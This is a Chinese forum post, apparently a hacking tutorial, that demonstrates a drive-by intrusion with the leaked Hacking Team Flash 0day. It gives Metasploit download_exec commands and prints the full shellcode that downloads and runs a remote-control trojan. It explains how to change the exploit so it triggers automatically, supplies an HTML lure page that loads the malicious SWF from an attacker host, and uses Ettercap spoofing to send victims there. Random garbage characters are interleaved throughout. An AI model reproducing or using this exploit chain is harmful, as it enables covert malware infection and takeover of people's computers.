|
6 G, |7 K4 X! q* s0 c 三、flash 0day之手工代码修改制作下载者实例入侵演示
& g* b0 v0 L3 B+ J" h: E; f) i Q+ L, W! O9 x, ?" y2 o4 Y
8 f/ ?- n p' ]! Q: t
利用到的工具: ( V8 g" d( O: C5 D& P' G) `9 N' \
T5 ^( J6 G- j! i6 X
8 F; |* M* c. a' E/ k: B Msf
1 G* J4 Z! ?% {* j! K; }
3 f8 U* {% \) ]2 q9 X: ~( |, V! ]7 C2 }0 `
Ettercap
- T3 R/ D' S9 k9 H
# V. c" Y" c) c- f7 x( Z& k
5 v6 S" K3 E1 l Adobe Flash CS6 ! ^/ I9 s$ r$ n4 _+ w; t' R
( h0 ^( y: D& \4 }, g' z5 w
' ^, S* [" \- h, X% p) u Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
- w7 G: I/ ~1 O9 G. p ) j( W' s' B+ y* z) t6 a
0 G& \7 j3 y3 z5 x+ s4 J
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
7 @; @3 W5 s$ Q& d1 C ; U6 l8 R: T: r6 |1 h( ?+ D7 t
# T) `' A0 f' O! D5 a0 b! @& E 如图:
# v$ g5 b5 b! p9 u& Y , [* w# Z4 u$ y0 o
5 g) B( ~. E0 I8 w - A- ~8 V2 p( a0 M2 d+ P9 h1 Q% k
7 z" S8 n" Q9 k9 o
$ m' Y0 d" Y& o  8 C" {( a( {1 e; I
& S Y: v! L$ `' a$ }3 w( }4 ^6 m) O5 @& Z5 t# u! P) G& D- p
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
, h% p8 u. I {/ w- D
4 V3 y( L7 e9 f9 g5 y1 c
; s6 ^) @/ x- T
7 d; R, d5 u. H8 S6 e$ J" D" G Z
' c" g& _! c' I7 ^2 K; f7 E; M# U3 J) r( F
1 F7 a9 d2 O" ~$ d8 ]( M
) Y4 T4 N ~, V8 A/ @ b
$ w* R `4 z# a9 `- m* f 然后执行generate -t dword生成shellcode,如下:
) f& L2 g2 N7 \( a& q & C$ D( m- }; R" k3 Q+ [
! u6 ~4 o* F! q  ! L& x- Y" {* }. B
& V) i! N* }' }. H" U8 N1 o' ^, S. R# f3 ^
复制代码到文本下便于我们一会编辑flash exp,如下: & j2 V' A, K O; i7 |7 {
" I1 o3 ?/ ^( g- r5 S9 z' m6 ^0 n6 g/ S+ R; p3 X
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, ) f" G; K. C* x$ g m7 M) A
# d H6 G, X U9 N: `
' Y, t: f4 [, a& x9 S J 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
- P5 f/ i! e N0 s" f V, n4 [& C+ E8 C5 F3 A
# B' o, I1 q+ _' Q7 C
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ; q# u( T9 o; n& q0 E6 T: Y4 I: D
" z( a8 b- p( A1 v' g$ v
& |* D$ P" w4 A
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ) O* J/ R1 ^- L- P) |: d
; i$ i$ s; F, U+ D5 ]3 ]8 ?( B- [4 C1 q7 c
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ; t: g% A) y. l
3 ?/ I: Z v3 g1 ~
$ p8 {8 E) { c5 d 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, , f. j9 `" }0 a* L$ p0 K4 {
. F, l7 c& e- ^8 J
' P; j6 @2 R2 J1 ^' y
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
* G' `6 k9 A! D, `7 |2 v
. {* {; R2 d) N0 `% j1 h+ n$ C) H" M% C' H. _$ [. g
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ! t) S% x! H- c$ H1 [
- r4 r I5 H- h i7 Y
: [) [, F! g0 i0 B' r0 R 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 2 W3 y$ f& {7 ?+ R6 a0 o
" o0 a, z; a: |" g
+ V% S* L* w/ d5 G6 z 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
. O6 N# F$ |& E
0 Q% `2 @5 f- p5 f" t
" F+ s& P; ^8 f5 N 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
' ?" p$ W5 l8 J, Q1 o: I * k0 v2 [: m! E' }5 |& S* b
( Z% u% H" B' |! g: z* ?$ ~
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 7 M T( \, W9 W
/ O e' l+ T$ [
. ?) F) f2 ?+ S \. ]& s! @) P- e 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 2 \" ?( ]# i2 \9 l( A, @
9 M$ N0 Q/ B1 E! U& W
$ E# a/ V9 w- g3 j 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 1 ^5 T7 F! t( H N }
9 ~1 ?; j0 J" ?2 o" L8 o
1 R! H; Y" @' K1 E7 @0 q. ~
+ I& n9 f$ [# z; i% L' r
: ~4 @; S. E3 I6 T8 `- N$ _# D6 ?$ H
$ }3 B* L: K! E+ {6 @# h 1 ~' I) k. _$ ~7 U/ O1 b# p
" W) b" W: M/ C* a' I$ ~/ \( O6 h) ]" M1 E0 {' p( z" j
下面我们来修改flash 0day exp,需要修改三个文件,分别为:
/ a% z% ~5 p7 C& N8 V" Z V% _9 H
* l. o3 t/ j, F6 r; k4 H, r r- q/ i/ b, G: P5 `! t! {0 S
+ c0 k( Y0 R$ n7 L; [' h: a
5 M+ ?, m/ Z3 y }$ X0 Q. @. u0 t2 J1 H9 [" B2 I3 J. {
先修改ShellWin32.as,部分源代码如图: 8 n( o4 ^+ A' G0 g0 y
& a+ |5 P( ~1 S' ]: L8 Y! O
' F- `1 z7 q& M f D) g T" o7 N  - i u8 ?: @; W* z+ }0 r
$ \. @ h" a: x/ G
3 Q) G5 @% n$ x" q# K9 W( N; W 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 2 ~& S: D4 t& e3 O2 B, A
) \1 j- P- T9 J( K' d \
9 A6 `8 ?/ V8 A 
; {) s* u# {( w0 e4 u- Q
6 B" ~0 j( V1 O' z. E. ]7 ]% E: M' Y: y
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 5 G9 j. y" B7 d3 |& ~
2 h% o7 r Z% d9 x
/ r) _8 F* ^5 M3 C9 ?9 L
 8 r- p' M+ d, A& Q% _: R
2 R ], E5 M' I# t
% J* I$ O+ B0 n9 X. l j
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: ; i2 r, q7 y+ f% R& }, u B
! h* T8 a: D" v4 w
$ K1 P F$ w* s5 b2 g% m% M
2 s+ y$ s$ s$ Y9 S7 h9 C ' a0 T9 g! c& b8 Y, p9 s
) J, O! K' Y9 X3 a6 T' f
" q% h$ N0 x8 W) L3 X8 n 3 ?* B" u& s) X- K( z9 {- j
8 X. O9 x* W- D! }1 S  ! m) y) m; C+ ?4 j3 c( R5 Q
* Q& ^$ h; \9 a& ^3 }, c! A4 ~ {6 g ~8 n; P/ ]* Y* J* W
然后点保存,下面我们来编译一下,打开
7 F2 \& O# g) V1 N5 P6 k" n+ v) D* K
: W# M7 y/ n& j; m3 G
1 B$ r: n! r, ~' j exp1.fla然后点文件-发布,看看编译没错误 * w- B! a [6 @- _
$ S, Q F# ~' {( L; \1 B
S8 f" M5 W7 G0 o, R4 d- J
0 w! c+ C# t) Q% b7 M. _ 8 u7 V9 ]+ N- R! j( M' L
2 @5 F4 c3 K, h/ [ 9 x7 x O8 e8 E' F3 S' S
" Z5 Y9 e7 {7 k! ^ R7 w8 y1 ]7 G$ B/ S _" }8 ?; ]. t" f
2 R+ N2 |" F2 s( z1 X
' O: [- S6 m+ T5 p: I; @
! v7 h/ K- ?& Q; s/ @4 t  0 P1 [+ z' Z( J, `
4 R7 P& o9 Z8 N' n% a
5 ~: y/ s ?' e: v. L+ [6 z7 r4 L" d 然后我们把生成的
3 F, D. ?+ @2 E. `9 W
6 V9 ~4 V7 {8 A" y7 T, }6 u. l- w( V: V+ k6 g( V
exp1.swf丢到kailinux 的/var/www/html下: # S) H9 t8 C( s9 ^" [" ]
+ i' G* x4 K- Q4 _ i7 C- \2 A1 s
3 j' _) G" g, O. B. |$ m8 E4 [ 然后把这段代码好好编辑一下 ; r1 P# _0 t% H! k" S+ s
4 `/ C0 L# L3 S; h$ U; P+ L: c" E3 {6 a$ P: t
5 ]# b- }+ V+ r4 ]8 _$ M
1 o; F9 B& Z. U: \$ h% L g' V f* J: B
8 z7 y, X! P* T0 o
7 m" E% q" u3 O' T
6 M) P5 ^) y* p+ m% G6 ?
! f8 }. l! i c: o. C/ ~ ) E2 p g, ~. o
; A$ c* M* `! |- u
+ ~4 ?/ `; x& A. Y( Q- Z
& ^5 n9 Y5 l& g
$ u/ [1 F# v$ ?. Q5 d0 c
$ j: t( q+ _5 u0 b ' R, t+ n1 e9 P- K+ r4 ~
& A8 S! F) \. S, l! X% N+ s; B
5 c( |9 o I) L/ r$ v' ]
8 S9 S$ s( v ]! D; e5 @" c8 D: I
8 i+ b4 J1 Y/ X+ F
<!DOCTYPE html> . x6 I+ E! J0 }3 W7 _- ]
& P; W, @6 x6 G+ W/ ^, m. `- h# ]5 K3 O& H$ a
<html> % Y* c* Y' g& S- o* _- B O$ z2 R
) @ M+ E& f9 F" [: @) q/ C8 k; j6 g
<head>
7 N( Y, |% B0 {) G4 H( B. c 2 V8 i+ \$ B& P, W5 C' i. k
! v: L2 ~; V1 R
<meta http-equiv="Content-Type" content="text/html;
, v l# y; L) l5 m * ^9 o, k2 T8 |
* Q. ?- _/ y. G1 ]) U3 t charset=utf-8"/>
+ O5 n' `4 v- h; l) W: R/ j 8 J- l0 t o7 W4 c& e# p- O
9 ?- v: R0 t2 s5 ?4 r
</head> 5 Z* r8 E5 p% T( U
3 u/ J& K* e" Q
% n- `9 P# S9 D" M8 Z# P* x <body>
! h" |" j1 p4 X0 V" P8 v " E: P2 H- E& V
+ j- P9 p% {4 c. r: n5 j
<h2> Please wait, the requested page is loading...</h2> 4 C7 N/ E$ ?, w' a$ X) T
9 p, L# R! J5 }. w' ~' v
$ U- V# }9 [6 Q <br> * L/ s6 d1 x! ~: u# h6 o) R
3 j7 f% z `; ?' n1 O! ^: \0 |+ ], V* p& y1 u+ v
<OBJECT
( ?: @! [" S" F: u$ o v* ]* z/ x7 l ' h' ?* o: |$ R0 y
' E3 {2 p& Q( R7 G. R2 R classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
C! X' h9 w; q$ N% n9 J 4 c' Z/ f3 d9 k. [* |
( j; J t/ L7 y) C: x- y VALUE="http://192.168.0.109/exp1.swf"></OBJECT> b1 a3 A7 h9 M7 d4 N) m2 c1 q" G8 R
3 f$ \) J5 O/ L/ ^5 `, r
* n9 l' f6 ]5 e& t3 L </body> - m9 R6 \, \& }! H. {5 s' \" w2 }3 h- x
7 l( {9 n: L( [ ^# f. J
( S' @8 @0 E. Q
<script>
, O9 Q0 E9 B* Z8 n5 x
! C4 X/ v4 p) x1 k0 H& U# I4 d/ n* u
setTimeout(function () { 9 `+ a3 f c% z8 h0 z
, O1 t! m2 @( n1 j/ e: s, t. h/ w' j
' H B" `. ^8 O# u6 |) g + T, Z8 W4 M+ X3 i
$ g9 [' d, y& @/ k
' [# R" B- ]! @" E window.location.reload();
/ k1 v. k. i. q( C c
' c( k3 H9 t, e: j! ?/ u x3 M4 V, x" c; v: `6 k1 b4 d
}, 10000); - Y1 R2 K C2 e+ D/ B0 v1 B* ?. W
5 l, E) j; f1 P3 V8 S! I8 n* T" a
3 Q1 k% d. e; y! }1 K 7 |, i* H- y3 w, I. w$ V
3 u0 X: H# \8 X1 U: d m
) X8 j; q/ e! u4 I! P4 I/ @ </script> / C' |+ P8 ]* }* [# }* W: T5 U* c
~% j' i5 Q/ C, \5 R3 s, w3 j
/ W) u @$ `' r9 Q9 ~/ n8 L
</html>
; E8 a; L0 w Q3 v# k & M8 y" [- `" q) \6 E d2 F8 r
* h5 q4 V$ [! I/ v7 s% i
# a) w) ~2 u4 m8 v1 x
# J4 P- k% s. M9 q, `/ c6 f7 z0 `0 B1 V
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
8 K0 G- F3 _$ R& ~1 [- c! z! x
- z9 }7 t# o w8 K3 y. m& a: I6 z+ t
; F" Y4 W/ N) Y/ q" i( L q - I- {% O: F+ J
7 Q7 W2 ]* W3 o( h+ d2 l
7 x4 x+ C1 ~/ B+ | F6 U" c6 ~
0 c D5 G( X2 \- b4 q" |3 C, f/ h
6 q0 ?$ Q6 v& `( E7 \5 d! g * e3 S E2 V1 O/ ~0 Y7 J, ?; h
" x. c6 _# _. ]% w" Z/ V: C# ^: g
5 _- \& n/ J4 T/ r4 {; M. o 8 ^- d$ ^% s v- e: X" K
) a/ J7 U8 @( b8 b2 O) N
. M [& y# d% i6 V8 |
# ]. l8 l, H3 t% [ Z
F' X% K3 X9 S, D" R) x9 Z- r
下面我们用ettercap欺骗如图: * r% q. I5 ~7 `; f1 U0 e
" R2 @% V' [4 w
, U7 r# a+ d, _- J8 f  + ~, Y% u y J
9 Q* _! A4 _& p" N/ d0 F6 j3 V
. c1 a5 o/ s4 O8 i* l
- [; b- ^( a3 l) R/ {
$ @6 S. U# m+ s7 |" U( ?$ N4 I3 x
下面我们随便访问个网站看看: 3 y# m$ E6 {! j3 L s
5 v2 Q6 y h1 O1 C& _3 ^$ C* o+ w
$ W, k5 n( [5 Q3 l2 R 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
8 x- R6 J- A$ V( a; M K- k8 x, Z+ q& x1 L1 S
# e( u; W" ~ z7 f0 K/ b
8 @. m1 h, g$ O5 V% Y! j; P, H / G4 w$ }; P# R- m m2 F
0 E) O( z0 W' A& c+ t- r 我们看另一台,
1 w1 ]1 x- [( m 4 T" G: D7 \4 p" w
* ]0 z: _* f+ D8 P& M 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 7 A L& Y) w+ h9 Z
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对